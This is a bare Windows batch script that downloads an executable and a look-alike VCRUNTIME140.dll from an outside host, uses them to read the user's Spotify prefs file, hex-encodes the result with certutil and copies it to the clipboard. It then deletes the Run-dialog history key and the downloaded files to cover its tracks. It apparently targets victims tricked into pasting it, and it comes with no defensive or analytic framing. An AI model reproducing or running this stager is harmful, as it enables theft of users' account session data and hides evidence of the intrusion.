@echo off cd %temp% set c=%random% set b=%random%.exe curl -s https://repo.zoult.hs.vc/the.exe --output %b% curl -s https://repo.zoult.hs.vc/041.dll --output VCRUNTIME140.dll %b% %appdata%\Spotify\prefs -o %c% certutil -encodehex -f %c% %c% 0x40000001 > nul type %c% | clip reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f > nul del %c% %b% VCRUNTIME140.dll